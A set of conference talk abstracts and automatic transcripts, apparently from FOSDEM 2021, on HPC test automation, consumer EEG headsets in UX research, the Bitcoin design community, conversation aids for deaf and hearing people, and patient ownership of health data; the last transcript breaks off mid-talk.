Buildtest is an HPC testing framework to aid HPC facilities to perform acceptance testing for their system. HPC systems are growing in complexity, with a tightly coupled software and system stack that requires a degree of automation and continuous testing. In the past decade, two build frameworks (Spack, EasyBuild) have emerged and widely used in HPC community for automating build & installation process for scientific software. On the contrary, testing frameworks for HPC systems are limited to a few handful (ReFrame, Pavilion2, buildtest) that are in active development. In buildtest, users will write test recipes in YAML called buildspecs that buildtest process to generate a shell script. buildtest utilizes versioned-based JSON Schema for validating buildspecs and currently, we support two main schemas (compiler, script). The script schema and compiler schema are used for writing traditional shell-scripts (bash, sh, csh), python-scripts and single source compilation test. In this talk we will present an overview of buildtest and how one can write buildspecs. Furthermore, we will discuss Cori Testsuite in buildtest with several real examples on testing various components for Cori system at NERSC.
|
10.5446/53604 (DOI)
|
Okay, let's start. So the talk is "Community-accessible electroencephalography: monitoring of the user's mental state in UX/UI research". A few words about biometrics and usability. Well, it's in no way a typical approach to getting information about the effectiveness of human-computer interaction nowadays, but the share of instrumental biometric measurements in usability is constantly growing. One of the reasons for such growth is the recent appearance of cheap consumer-grade devices with biometric sensors. They are typically produced for entertainment and fitness purposes, but are precise enough to provide useful information to assess usability metrics. In this talk, we'll cover a subset of these consumer-grade devices, namely electroencephalography headsets. Let's start with the consumer-grade EEG devices available on the market. I'd say that the most affordable of them is placed here in the lower bottom corner of the screen: it's the MindWave EEG headset produced by NeuroSky. It costs less than $200 and has only one channel of measurement; that's why it's cheap. Then, if you try to find something more complex, it will definitely be some device from Emotiv. The newest one, I'd say, is the so-called Emotiv Insight with only five channels, or five sensors, which is still affordable at about $300, or the more comprehensive EPOC, now the EPOC+, with 14 channels, 14 sensors obviously, and a price of about $800. And there is the possibility to increase the price even more by buying a research license; we'll speak about that a little bit later. Of course, there is a nice open hardware solution available on the market. I'd say that it's the most expensive one if you do not build it yourself but buy an already assembled device from OpenBCI. The number of channels varies from 4 to 16; the cheapest variant with four channels would cost you $600, and the more comprehensive ones can cost you even more, maybe more than $1,000. A little bit more about the primary goal of these devices, using the example of the cheapest one, the NeuroSky MindWave. Its single sensor is really good at measuring mind concentration and mind relaxation, and that's why there are a lot of games and, I'd say, game-targeted devices based on this EEG headset. The most known is the Puzzlebox Orbit helicopter, which is more or less mind-controlled. Well, you cannot say or just think "fly in some specific direction", but at least you can make it fly higher and lower by concentrating your thoughts and relaxing. And obviously the most talked about of them were the Necomimi ears, actually artificial cat ears, which stand up when you are thinking about something and relax when your mind is relaxed. The ears are not produced anymore, but you can still find them on eBay or other second-hand markets. A little bit more about channels and EEG waves. Traditionally, the EEG signal, which is actually the electrical activity of the neurons of the human brain, is divided into several frequency ranges. Here you see five ranges, which are the most informative. And you see here that all these ranges are visually distinguishable one from another, I mean the shape of the signal. That division exists for historical reasons, from before computers: scientists were able to visually distinguish activity in a specific EEG range. And still, they found that the noise which your brain produces in a specific range reflects some specific activity. For example, the beta range reflects mind concentration, mind focus, and also some activity of the physical senses.
The alpha wave actually indicates a relaxed mind, light meditation, or maybe some creativity-related processes, and so on. Frankly speaking, alpha and beta waves are the most informative from the point of view of our topic. If you have a lot of sensors, and not only one sensor like in the cheapest headset we were speaking about previously, then you should position these sensors on your head in some specific places. For example, here you see the proper placements for the EPOC and EPOC+ EEG headsets, which are marked with color. All possible positions are well standardized and they have specific abbreviations like AF, F and so on. This allows us to get information from sensors in specific placements. How can we get data from the consumer-grade EEG devices? Actually, there are two approaches. The first is a local API: when the device is connected via Bluetooth or USB, with some radio dongle or something like this, you can use the SDK from the vendor of these devices, for example the so-called Community SDK from Emotiv, which was proprietary software ("Community" was actually the name of this SDK, but not its nature). You could query a device locally. The other approach is using some API from the device vendor which involves an intermediate remote server of the vendor. In this case, the device sends data to the vendor's server, and some tool later downloads this data back for you. The new version of the SDK from Emotiv works exactly in this manner. A little bit more about the exact headsets. The NeuroSky MindWave, the simplest one: here you see the open source tool Puzzlebox Synapse, written in Python by the way, which shows you the exact intensity of the electrical noise in different ranges on the one and only sensor of this headset. And you also see the quality of the signal, which is measured based on the reference electrode. The Emotiv headsets, which have many more sensors, allow measuring much more than the previous one, obviously. While the previous one could measure only two metrics, the so-called eSense Attention, substantially based on the intensity of beta waves obviously, and eSense Meditation, which is more alpha-wave based, the Emotiv headsets allow you to detect some more informative states of the user, like smiles, surprise, frown, blinks, and movements, which are detected just by the accelerometers built inside the headset. And if you have the commercial license targeted at research activities, even more. And obviously, they allow measuring the separate waves, I mean frequency ranges, of course. A little bit more about metrics. You see examples of measurements here, like alpha waves, low and high beta waves (the lower and upper parts of the beta range), gamma waves and theta waves, and some detected events like blinks, surprise, frown, and smile. If we would like to measure emotions, and we have raw data from the electrodes of the EEG headset, we can use a slightly different, more scientific than industry-grade, approach based on the emotion model named the circumplex model, which was developed by James Russell. In this case, we use two metrics: arousal and valence. Valence may be negative (you are unhappy) or positive (you are happy). Arousal is, well, what it's named: you may feel something intensely, or just the opposite. If you present these two parameters as coordinates in a two-dimensional space, then you can estimate some specific emotions like excitement, or maybe depression, boredom, stress, and so on.
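For reference, written out as band-power ratios, these two metrics are commonly computed roughly as follows. This is the widely used frontal beta/alpha formulation, given here only as an illustration; the speaker's exact electrode choices and ratios are described next:

$$\text{Arousal} \approx \frac{\beta_{AF3}+\beta_{AF4}+\beta_{F3}+\beta_{F4}}{\alpha_{AF3}+\alpha_{AF4}+\alpha_{F3}+\alpha_{F4}}, \qquad \text{Valence} \approx \frac{\alpha_{F4}}{\beta_{F4}}-\frac{\alpha_{F3}}{\beta_{F3}}$$

Here $\alpha_X$ and $\beta_X$ denote the signal power in the alpha and beta bands on electrode $X$; a higher beta/alpha ratio indicates higher arousal, and the left/right asymmetry serves as a proxy for valence.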
As you see on the left part of the slide, arousal can be measured from the data of four electrodes: AF3, AF4, F3 and F4. You just calculate the total of the beta waves on these electrodes, calculate the total of the alpha waves, and divide one by the other. Valence is calculated in a similar way; actually, it's the difference between the left and right hemispheres of your brain in the alpha and beta ranges. A little bit more about getting raw data. If you look at the previous diagrams, that's what an Emotiv EPOC will return to you without the research license: it gives you the mean noise in a specific frequency range, but nothing special about the raw data from each electrode. So if you would like to get some estimation of the emotional state based on these formulas, you need to access the raw data. In the case of the OpenBCI project, which is open hardware and open source, things are obvious. In the case of EEG headsets from Emotiv, you can still use the so-called Emokit library, which is not so good from the usability point of view, but it allows you to get information from all the sensors you need. After that, you should apply some filtering to find the intensity in a specific range and do the calculation. Emokit even has some front ends. The best of them is absolutely dead; I mean, the combination of libraries which it uses makes it extremely difficult to build in contemporary environments. Actually, it's a terrible mixture of a number of Python libraries, the fourth version of Qt and wxWidgets, and this bad combination prevents it from working. So the probability that you will be able to build it is not very high. Still, you can use the more modern web-based front end, CyKit, or just create your own software using the Python or C language library of Emokit. And it actually even has a version in Java, for those who like it. A little bit about actual testing based on data from encephalography. Here is a brief description of an example which tries to find out the effectiveness of window switching in three paradigms: one with the task panel (actually it's the Plasma desktop), then the GNOME Shell activities screen, and the now obsolete Ubuntu Unity window-switching approach. The task is copy-pasting numbers from one window, inserting them into another window, and doing it repeatedly, which involves switching between several windows. Windows one, two and three are chosen randomly as the target for copying the numbers, and window zero is the source of these numbers. So here we can see a comparison of mind concentration and tempo, which obviously is the speed of work. GNOME provides the highest tempo of work, possibly because placing the cursor in the left corner does not involve a click but instead involves some physical activity, which works like overclocking for the user, for a short period of time of course. The lowest tempo was reached in Unity because of the inconvenient window-switching model, which involved several clicks to get to the necessary window. And actually the left panel is not so good as a placement for a window-switching tool. If we look at mind concentration, the highest mind concentration is reached in Unity because, well, the user is totally concentrated on moving the cursor in the horizontal direction. The lowest mind concentration was reached in the Plasma desktop. One of the reasons was that the people who were under testing were mostly familiar with the taskbar.
And the other reason is that the buttons are placed in the same positions in the taskbar, so physical motor memory is used, and also vertical movements of the cursor with a mouse or trackball are easier than horizontal ones. So what are the results which you can take away from this talk? First of all, we should note that consumer-grade electroencephalography is nowadays mature enough to be used in UI/UX comparisons of interfaces. You can use mass-market devices, and these devices are more or less open-source friendly. Also, you should take into account that the more comprehensive the device you plan to use, the more difficulties you will have in getting data from it. For example, the MindWave has only one channel, but it's the best choice if you just need to measure mind concentration: it's the cheapest, the easiest to maintain, and the most open-source friendly one. If you use the EPOC, especially the newer versions, you will have substantially more difficulties, because Emotiv makes a lot of effort to protect your electroencephalography data from yourself, and it will try to push you towards more expensive licensing for research needs. But you can still use some of the open source tools we were speaking about to get the raw data and do the calculations yourself. And finally, OpenBCI sounds like the most open-source friendly (well, actually open source and open hardware) project among them, and the most comprehensive, but I'd say it's also the most expensive one if you buy it, or a troublesome project if you build it yourself. Actually, building it involves a lot of soldering, it's a rather complex electronic device, and things are even worse because some of its components are not produced anymore; at least some simple capacitor arrays have to be substituted by yourself with some analogues. So it will demand not just soldering, but some electronics knowledge as well. So anyway, if you have got the device and you can get metrics from it, you can get time series of some measured EEG parameters, either ready-made, like the metrics from NeuroSky and Emotiv, or calculated by yourself. So you can get the mean state of the user in the situation when he or she works with the system, and finally get an estimate comparing several UI suites or interfaces: which one is the most positive? Especially when you compare it with other parameters like the speed of work, the errors and so on. That's all.
|
Estimating the user's mental state with a set of special measuring devices can be helpful in detecting bottlenecks of the human-computer interaction. Until recent years, electroencephalography devices were too expensive and too complicated for most UX researchers, but now there are affordable consumer-grade EEG devices. The talk covers EEG headsets produced by NeuroSky and Emotiv, as well as the open hardware OpenBCI project. Each headset has its advantages and disadvantages for UI/UX research. Commercial devices have different primary goals complicating their usage for research with cyphering, special licenses and limitations in the vendor-provided proprietary SDKs - but open-source tools developed by the community improve the situation. OpenBCI is quite the opposite: it is fully open, but much harder to obtain/build. Specifics of data that can be acquired from each headset is reviewed, and existing open-source tools and libraries to get these data are discussed. The talk explains how we can use each headset to get information about the user's mental state. Mind concentration or relaxation is a highly informative parameter for UX; it can be easily evaluated and it can be obtained with any of the EEG headsets. Besides that, most of the reviewed devices provide enough data to measure rejection and arousal factors, which can be used to detect positive and negative emotions. Finally, EEG usage scenarios with examples of the FLOSS projects exposed to such UI testing are discussed.
|
10.5446/53605 (DOI)
|
Why did we decide to title it that? That's what it says on our homepage. Because we think that it is important to make Bitcoin more intuitive and accessible for everyone. I've always been attracted to design on the border of technology, because new UI challenges and UX patterns emerge. So I was attracted to Bitcoin for that reason. There's a lot of complexity that I like. And just a lot of crazy people. This community, at least definitely in the wider open source community, and even within the Bitcoin community, is still not that visible. A lot of it, I feel, can be quite introductory as well. I feel like what we've got here is just a nice slick introduction to the community, as opposed to deep diving into anything. It's probably more about behind the scenes, isn't it? Like how it works, or, you know. 15 minutes, what do I want people to get out of this? Do we want to leave time for questions? Is it visibility, like Connor's saying, what's the goal? Because that would inform the title, or maybe the amount of information we're putting in each slide. Are we telling people how to design Bitcoin for everyone? We're showing them how we're doing it. Thank you for kicking me off here, Paolo. I will talk about how we're doing it, but let's start with a little bit of background. So my name is Christoph Ono. I am here to represent the Bitcoin design community. And as you may know, Bitcoin is magic internet money. It adds something new to the internet. We're used to transferring information super fast around the whole world, but we also know everything on the internet can be copied. And Bitcoin has changed that: it has managed to create scarcity, so that there are things that cannot be copied, and that is value. So it's an internet-native currency, and it allows us to store value online and to exchange that very, very easily and seamlessly. It was proposed in 2008 in a white paper by an anonymous person or group of people called Satoshi Nakamoto. We don't know who they are. But it was launched in 2009 as an open source project, fully embracing open source and decentralization and all of those good things. And now, in 2021, we have about 100 million people who have Bitcoin wallets and who store value and transfer value around the world. And as this user base has grown over time, it has shifted from those first initial people who were very tech-focused, and now we have a global audience. And as it keeps growing and it's proven that it's robust and it works, that audience keeps evolving and the interaction needs are changing. So it needs to become more accessible, it needs to be easier to use, so that everybody around the world, people who don't have access to traditional finance potentially, can also interact with this and it helps them with their needs. And user-centered design is now well positioned to help out with this continued growth and evolution of Bitcoin; at least, that's what we believe. So a lot of us in the Bitcoin design community, for some reason we got into this field. We were fascinated by it. We wanted to do some work. We saw problems we wanted to solve in design and user experiences. But very soon we realized that this space is not very well suited for designers. First of all, there are very few designers, they're spread across this whole ecosystem, there are very few resources, very few best practices, and that really made it difficult.
So the idea came up to form a Bitcoin design community to create space for people to meet and exchange and discuss and create those resources that everybody wants and to help each other do good work. We have a website now, Bitcoin.design. So we started this about half a year ago. You can go to our website, get some basic information about what we're doing. And from the beginning we try to embrace creativity and the voice of all the individuals in this community. For example, this header banner here was created by Alexa. And you can click the submit your own button here right over my head. And it takes you to a page where you can submit your own homepage banner and it will rotate with all the other banners that were submitted. So from the very first impression we tried to say, you know, here's like a space for design and creativity. Our more transient conversation happens on Slack. And you can join via Bitcoin.designers.org. We have over 800 people now across almost all the time zones in the world. And a lot of discussion across all kinds of different topics from onboarding or more technical things and payments and design reviews. So Slack is private and more transient. GitHub is kind of where we form consensus around where we discuss our more long-term coordination things and our processes, things like, you know, who owns the domain and how is that managed. We also have our website up there and the Bitcoin Design Guide project that we're working on. And it's public and it's easy to see and observe. It's a transparent place to see all the activity that's happening and what we're working on. Our newsletter helps all of those people who are not 24-7 on Slack who have other things to do in their lives every three weeks. They get an email inbox with a short precise summary about what was done recently, what's happening, what's coming up, potentially, you know, opportunities to help out with different things. Always very short and precise. The other thing we're doing is we have weekly calls and we rotate between a few different formats. So the Bitcoin Design Community calls are an open format where everybody can show up and we have more open and loose discussion, sometimes presentations, sometimes different people host and organize them, and anybody can suggest topics, sometimes things that are very timely, governance things, sometimes it's just, you know, open conversation and chatting. The second thing that we do are Bitcoin Design Reviews and those are way more focused. That's where we try to get projects or designers to come in and sign up beforehand, provide some information about the design problem they have or something they'd like to get feedback on. And then we try to give very focused and organized feedback and also open up, you know, potential doors for future collaboration. As I mentioned, we have a design guide project, a big project that we, hopefully everyone in the community feels like they can work on. And we have, every three weeks, we have this jam session on there to also discuss what's happening in that project and organize and push things forward. There are also calls organized by community members, for example, this design sprint for merchants organized by Johns. So merchants also want to accept Bitcoin in their stores and their specific software being developed for that. And Johns organized a design sprint with the people working on some of that software to help identify user needs and all those things. 
And they were not familiar with the design sprint format, so we introduced them to that as well. There was also a lot of interest in using Figma and a lot of questions about how to use Figma. So we had a crash course on that that a lot of developers actually showed up lots of interest from the developer side. That was interesting. So we have a lot of different people working on all kinds of things, whatever they happen to be passionate about from different types of surveys to podcasts to art project, UI kids, different research and all kinds of things. And then we have this community project, the Bitcoin design guide. You can think of it as the human interface guidelines like Apple has a material design, we try to bring all the best practices together and not prescribe what to do, but provide the information people designers need to make good decisions for whatever problems they're trying to solve. And this also starts this whole section on getting started, which is meant for those new designers that are potentially struggling to figure out how to, what to even to do with Bitcoin, how to see themselves in this open source world and why Bitcoin is so different than things that they may know. There are also things like the visual language of Bitcoin, because it does not have a slick brand by a fancy agency. It has a visual language that evolved over time simply out of the community activity and the activity around Bitcoin. So laying out all those things will hopefully allow designers to more quickly get started in the field in this area. And then we go deeper into very specific and unique areas of design that are specific to Bitcoin. So it's a big work in progress. But I'm very excited about the progress on this one. So as I mentioned already, we're trying to embrace open source, the best of open source, but we're also trying to figure out what open design is like and what that means. Because not everything in open source or those practices that were established over the decades, they work so well for designers. Even just if you look at design tools, Figma does not have files and so they cannot be checked into GitHub, for example. So the total collaboration mechanisms that we know from kind of the Git based development don't really work so well for designers. They kind of counterintuitive, they're kind of hard to get into and learn, and some of them don't even work so well for the tools that we're using. So we're trying to pick the best of open source, make some tweaks, add some new processes and figure out ways that both designers and developers and everybody else can work with design, solve design problems in a way that they're comfortable with and that they can be productive with. So the worst in the area is always, you know, and this is a stereotype here, of course, that we have developers on the one side and they just want to code stuff and it's functional and ugly and then we have designers on the other side. They just want to make things look cool. And it's just not realistic. And we're trying to, first of all, change the dynamic, get everybody to collaborate and consider the same things, which ideally how the user needs, and then use the tools of development, use the tools of design to make something. Together. And then we also try to, you know, take it a step further here because there aren't just the stereotypes of designs and developers, people are complex. They're different rules. Some people want to translate some people to use a research. 
Some people really want to do community management or project management. And all of those are valid and important and needed. And also the user, so we can try to get them more involved in this process. So from, you know, from those stereotypes, it's a long way to get here and we're trying in 2021. We're going to try to sort through a lot of this stuff. It's another way to look at it and this is not a perfect representation here. So we're going to pick some of these relationships here like the interactions between designers and open source projects and designers not equal to designer, some designers, let's say they're they really love, you know, building out a brand or a visual style, and they're interested in short term collaborations, or they might be focused on one particular topic like onboarding or so. And other designers prefer being embedded in a project for a long period of time, and slowly iterate and see a project grow and have relationships with everybody in the project. It's very, very different roles. We're trying to help define those and facilitate for people to find those roles that they're comfortable with. And on the other hand, you know, projects, designers can't just just bump into projects, projects need to be open to accepting designers accepting design processes. So also trying to figure out how we can make that happen. User research is a little bit tricky in Bitcoin because we don't know who those users are. There's a big focus in anonymity and privacy. So we're trying to sort through how we can do good user research trying to gather research references so everything we do come up within the guide decisions we make also informed very well. And Bitcoin being a global phenomenon, doesn't really make it that much easier. But we're trying to work through that. And then of course, as I already mentioned before, ideally the Bitcoin design community cannot just for designers be this go to place, but it's can feel comfortable and say, Hey, I have a design problem here. I want to solve a we're looking for a designer. And ideally we can have to smooth back and forth and collaboration between everyone. So some of our more immediate next steps here in the next three months, end of the first quarter 2021, we are hoping to push a first version of the Bitcoin design guide life, ideally that covers the majority of the content looks pretty good. It's fairly complete to help allow people to solve problems, or most common problems at least, they come across when working on Bitcoin projects. And then we really need to collaborate with different projects. So our ideas about open design and design collaboration. We really need to put those to the tests and work directly with projects and integrate a lot of the work into those projects that we're working with and see results and get that user feedback in the end. And hopefully that allows us to validate all of our ideas and we'll make that Bitcoin design guide so much better because then it's been proven in the real world. And you know, the big thing is we need to mature. The community is six months old now. Lots of big ideas. Lots of excitement here, lots of activity. But, you know, we need to see how it all pans out and for that we need to experiment and test and iterate. I find that really exciting here. And a conference like this is also perfect to open up conversations and learn from others. So I hope, hope we can get in touch here with a lot of people. So thank you for listening. 
Thanks for the Bitcoin design community members who helped with this presentation. And thanks to Pablo Stanley who made these illustrations of all those people that were in these slides here. And now let's open it up for QA. Thank you.
|
Since the middle of 2020, an open community has formed around the goal of making Bitcoin more intuitive and accessible. Our big project is a Bitcoin Design Guide to help both designers and developers create better Bitcoin experiences faster. We also work to promote the idea of open design, to bring more designers into the space, and to help open-source projects adopt better design processes. This presentation will provide an overview of all these efforts, where we are (early) and what the future might hold.
|
10.5446/53611 (DOI)
|
you Hello, welcome to my presentation, our age communication kit, conversation starters for deaf and hearing. I'm Daniel Wesselig, an interaction designer from Berlin. Thank you to FOSDEM21 and especially the room DDesign for giving me the possibility to present some work here. The presentation will last approximately 15 minutes and a quick note in the beginning. I'm using a tool for this presentation. It's called Space Deck Open and it's kind of a mix of the proprietary tools Miro and Prezi in a way and I was quite glad to find this tool because it's a useful thing for workshops and so on. You can find the slides of this presentation under the link provided and there's also a link to the GitHub. You might be wondering what the connection between inclusive design and open source hard and software is and I've been part of a team for the last 20 months or so. EU funded project caribolds where it's the goal to collect and present and co-develop new solutions for individual needs and offer them in a replicatable form on a platform called welder.app. As we normally would be in Brussels right now and as I was last time at FOSDEM, a big shout out to open source publishing from Brussels. I've first seen them at a conference called typography leaped in Weimar probably 2010 and I really liked the concept of doing classical desktop publishing but only using open source tools to do so and also sharing like fonts and other things doing workshops and open source publishing probably had a part in me switching over to Linux and trying to do all my design work in Linux with open free and open tools. In 2015 or 2016 I was in Singapore at a lab called augmented human lab and we got the chance to develop a new starting indicator light for swimmers for deaf swimmers that would be used at competitions in general and the previous model was just one like orange blinky thing at the side so you had to like turn your head around and was difficult to see and you had like a real disadvantage in jumping from the starting block so we developed this project that consists of like two LED rings a green and orange one the green ones in the middle so you have like this anticipation phase and yeah and we made it compatible with an Omega timing system that is widely used. I really liked working on this project this was not necessarily like open source hardware but it was a way for me to work with deaf people and understand needs and requirements and transform them into a real product. I really like open hardware so this is a slide to illustrate my interest in open hardware in probably 2007 or something we did a project called Lute Claus Pro like a toy sequencer that won't show now but like yeah have a long-standing history of interest in open source hardware. This is kind of like a nerd joke but I think it's really important to use floss free Libre open source software to create open source hardware because it really lowers the barriers for contributors and for reproduction adaptation in general and this nerd joke is a little bit okay like you have to press both buttons to make the LED glow. This is Tomy the collaborator in this dialogue starter project. 
You can see Tomy with some prototyping materials. At an open source academy — an Open Health Academy — we were together in a team trying to find solutions to help with communication between the deaf and the hearing. On the right there's the prototype of a little owl that could serve as a translator, and on the left Tomy is wearing a mock-up of an augmented display that was created during that process. Tomy is an interface designer from Berlin, currently in Denmark at Frontranas, and his Bachelor thesis in 2019 was also on this topic — I tried to translate the title because it's in German, but roughly it's a translation interface designed to overcome barriers and fears between deaf and hearing people. Tomy is very happy with his deaf community — there are all these different cultural things and he feels very comfortable there — but sometimes it would also be nice to meet new people outside of that bubble. And since you can't actually see that someone is deaf and not hearing, it's not so easy to get into a conversation, especially if there's no sign language interpreter in the room, so this is a topic where I'm trying to help find some solutions and ways to work with this. Deaf culture in general is a super fascinating topic, because there are all kinds of cultural shades, and one design collective I had the chance to meet creates a magazine called Deaf Magazine, with content that has a special connection to sign language and the deaf community. I encourage you to check it out — you see the link below in the slides. Morphoria design collective. These are some posts from the Open Health Academy process of creating this owl, and in the end there was also a prototype with a Raspberry Pi inside: basically a way for me to type into a Telegram chat, and then the owl, which you could give to a person, would actually speak what I wrote in the chat; and when you said something to the owl, it was doing speech recognition and sending it back to the Telegram interface. The project we are collaborating on at the moment is called Dialogstarter, and it's supported by CityLab Berlin and by the Nutscom's Berlin — thank you to both of these institutions. Some notes on what we are doing there right now: one thing we're working on is a card set, basically physical playing cards that have certain conversation starter texts on them, and we're doing a couple of workshops now to see what elements should be in there. Additionally, we want to make a hybrid game — we don't know exactly how yet, but maybe involving some electronics and some matchmaking, so that you can answer by pressing a few buttons on a standalone device — and there will be more happening. Another project uses an LED badge. There is already this great project from FOSSASIA called Badge Magic: it's an Android app, which you can also find on F-Droid, where you can type in text and it's sent via Bluetooth to the LED badge. We want to make a physical speech bubble with it — it's a little bit comical, you can hold it up and communicate things and say something like: "Hi, I'm Daniel, I'm an interaction designer from Berlin — approach me if you're interested in talking about the weather."
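As an aside on the owl prototype mentioned above: its loop of "typed Telegram message becomes speech, spoken reply becomes text back in the chat" could be sketched roughly like the Python below. This is only a hypothetical illustration, not the actual Careables/Dialogstarter code; the bot token is a placeholder, and the choice of libraries (python-telegram-bot in its pre-v20 API, pyttsx3, SpeechRecognition) is an assumption about one possible way to wire it up on a Raspberry Pi.

```python
# Hypothetical sketch of the "talking owl": text typed in a Telegram chat is spoken
# aloud on the Raspberry Pi, and the spoken reply picked up by the microphone is
# transcribed and sent back to the chat. Token and library choices are placeholders.
import pyttsx3                      # offline text-to-speech
import speech_recognition as sr     # microphone capture + transcription
from telegram.ext import Updater, MessageHandler, Filters  # python-telegram-bot < v20

tts = pyttsx3.init()
recognizer = sr.Recognizer()

def relay(update, context):
    """Telegram -> speech, then speech -> Telegram."""
    tts.say(update.message.text)    # speak what the remote person typed
    tts.runAndWait()
    with sr.Microphone() as source:  # listen for the spoken reply
        audio = recognizer.listen(source, phrase_time_limit=10)
    try:
        reply = recognizer.recognize_google(audio, language="de-DE")
    except sr.UnknownValueError:
        reply = "(could not understand the reply)"
    update.message.reply_text(reply)

updater = Updater("PLACEHOLDER_BOT_TOKEN")
updater.dispatcher.add_handler(MessageHandler(Filters.text & ~Filters.command, relay))
updater.start_polling()
updater.idle()
```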
So we want to make this visual tool for connecting with people, for example at a meetup or some informal physical meeting situation. The goal is to make a parametric OpenSCAD model, as we did in other projects in the Careables context, in order to have good adaptability — so maybe it's possible to use it with different LED badges, put a stick in there, maybe the speech bubble idea also changes and it will get a different physical shape — and we want to have this represented in a parametric model. Quick shout out to Careables, there's the obligatory funding note, and I'm very happy that I was able to present some aspects to you. Check out our website, and if you have questions there should be time for Q&A now. Thank you very much. Goodbye. Okay, that went really well so far, so now we should be starting the Q&A — I think it's broadcasting at the top of the video when we're broadcasting... I think we are ready, so I'm going to turn my video off. There were a couple of questions. Saptak had a very nice question: sign languages, as I know, vary from country to country — is there a way of localizing sign language? It's a really nice question. I'm definitely not an expert, but I know that German Sign Language (Gebärdensprache) is also used in Belgium, for example, and maybe in Luxembourg I think, and there's American Sign Language, which is kind of a common set — so they are very regionally different languages and dialects. Do you mean programmatically identifying them? I don't know about the technology, but I know there are attempts to make gloves, for example, to capture it; but the movement of the hand is not the whole story, because so much happens in the face, so these attempts are a nice direction but probably not very useful. Okay, so Jan had not exactly a question but more of a comment, and maybe I can speak a bit about it. He says: great that deaf people were involved and that you took interest in deaf culture; very often this is lacking, and new devices frequently miss the point. Yeah, I think it's super important not to just design by assumption, but to actually talk to as many people as possible, try to understand which things could be interesting and which are not necessarily interesting, and then take it from there. It's a very good experience, and also really great to learn about different cultures — it's a very fascinating culture actually. Okay, so Katarina has a question: I don't know much about sign language and its universality, but besides the visual backup, are there any strategies for haptic devices — movement, vibration? Are there vibrations that are universal and can be understood by multiple people, something maybe similar to Morse code, so the dot-and-dash communication method, but like a motion to draw attention, to signify danger, etc.?
So on the one hand I know that but I don't know how they technically work and I don't speak them but some people that are blind and deaf they there's communication ways by by touch but I don't know how they work exactly but it's very interesting because I did my PhD on like simple displays and I was also like trying to figure out if you just have like one pixel or something can you already express something that's more universal than a Morse code or something so I think the the goal would be to find tactile patterns that can be understood without having to learn it bit by bit basically or information like that you already get a feel for for danger and I'm not sure what like danger for example would feel like tech in a tactile way but but yeah I think that's a very fascinating and interesting way to do further research into okay you
|
Deaf Culture and Hearing Culture, both have established ways of communicating among each other. When you want to mix and mingle, members of both groups need to find new shared channels. We present design considerations leading to our playful prototypes, serving as icebreakers and dialog starters. We rely on open source software to create open source hardware.
|
10.5446/53612 (DOI)
|
Hello, my name is Juhan Sonin. Let's talk about owning your healthcare experience. I run a healthcare design studio outside Boston, and I also teach at an academic center in Cambridge here. As part of my healthcare background, you should know what's influencing my brain — definitely it's not money. And if you have any concerns, well, heck, my entire genome has been open sourced on GitHub. You can download it, put it on a crime scene — make sure there's a goat or a sheep nearby. If you have any questions or comments, feel free to email me; I'll try to get back to you within two business hours, or publicly shame me on Twitter. Yes! The medical profession is noble. Hell yes. And yet it has been infiltrated by the mighty dollar for decades, and I think we use this nobility as a shield, as an umbrella, to obscure some of our activities. Let's look at one example. The two square miles between, let's say, Harvard and MIT — because I'm looking hyper-locally — occupy about 25% of healthcare GDP. That's $750 billion. That is a ton. And that kind of concentration — the earth doesn't like it that much, at least in nature it doesn't. And that's 1% of global GDP. So the exercise here for me is to follow the money, because the systemic flaw we have is that we put profits over people. One example of this that's particularly egregious was revealed by ProPublica and the New York Times relatively recently, with a guy at a very well-known cancer institute in New York City, where he just ran the gauntlet on ethics by breaking lots of ethical conflict-of-interest rules — from being on boards to being an editor of a journal that publishes data and then proselytizing about it. It was a mess. One particular case is about Paige.AI. It is a startup that was born inside the hospital and had exclusive rights to deal with the data of the patients. And yet it was owned by the hospital and paid for by the public. Hundreds of different clinicians encoded the data — it's not like one person did it. And really, ultimately, it's about making the rich richer, with the executive team being the investment team for the startup. And it gets better: this work was done over 60 years. And again, it's my data, your data — people who visited have no idea that this is going on. All of it, again, for a profit-driven venture. And we're finding this in .edu land and .org land, where nonprofits and educational institutions are really going after different ways to make money. I think this is a problem that's infecting most of the United States and now most of the world. And look, he's hiding in plain sight — it's always interesting when someone's an intern and CEO at the same time. But the main thing I want to concentrate on is that the data use agreement keeps us patients out of control. We don't have any kind of say in what happens to our tissue slides for economic use. So what kind of design is this? Well, look, hospitals own the data. We don't have ownership rights as patients. The IP is owned by executives, yet it's funded by the public. This is a perfect example of corporate welfare at its finest. Ultimately, it's the rush for bucks over everything else. This is ethics as situationally optional. It happens all over the planet, not just at Sloan Kettering, but at Walgreens, or you name it.
And it's happening right now in Boston, actually, again, with the CMO of Moderna — one of the leading companies making the COVID vaccine — where he's taking out a million bucks a week from his company. He's got the right to do that, but he just got half a billion dollars of taxpayer money this year. That's the kind of world we live in. And yet here we are, we're complicit. We're sloughing our data everywhere, without rights, across the planet, in order to feed the economic engines of the planet. So we have to understand a little bit of the underpinnings of the scenario: well, what are we sloughing around? What data? What kind of data is it? Most often people think that health data is clinical in nature. But it's much more than that. It's any information about a person's life that assists in making decisions. This, by the way, was our definition for the Wikipedia article that we seeded just a few years ago — there was no health data article on Wikipedia until a couple of years ago, which is insane. So you think, OK, great, it's my labs. It's what my doctor and I do together, or my nurse, the clinical trials, my genome. Great, yep. But it's way more than that. It's your salary — your salary is a health data point. So is the neighborhood you live in. So is what you do. It's really life data. If you want a better and more detailed insight into this, we have an open source repository, Determinants of Health, that shows this a bit better. So health data is more than you think it is. And you don't own it. And you damn well should. Now GDPR, which many of you are probably familiar with — you live in it — is a much more mature version of what we should be using here in the States. But it doesn't outline ownership either. In recital seven it says, OK, yep, control and access — but nothing about ownership. If you go deeper into the recital about the right of access, it actually articulates that the data does not belong to you. But it should. Why? Because your data is promiscuous. As you go and see a clinician, a nurse, on your phone, whenever it is, it can go to the labs. It can go to the pharmacy. It can go to the PBMs, the pharmacy benefit managers, and to the government. It goes across the spectrum — especially if you ask Alexa what's happening: on that round trip, five or six hundred different services handle your data as it goes from voice back to repeating the answer to you. If you want some more information about this, we have another open source visualization here. Because, look, this has been an age of healthcare surveillance, but my hope, my supposition, is that patient data ownership turns this past couple of decades into a net positive. Because patients should own their data. And some well-known people are saying that, yep, they damn well should — Seema Verma, the head of CMS, the biggest American and one of the biggest socialized-medicine programs on the planet. And one paper that outlines this very well articulates three components to getting close to this sort of goodness. One, you need common data elements — many countries have this problem where we can't even have the same definition for the same data point across systems. The second thing is, you have some kind of encounter receipt.
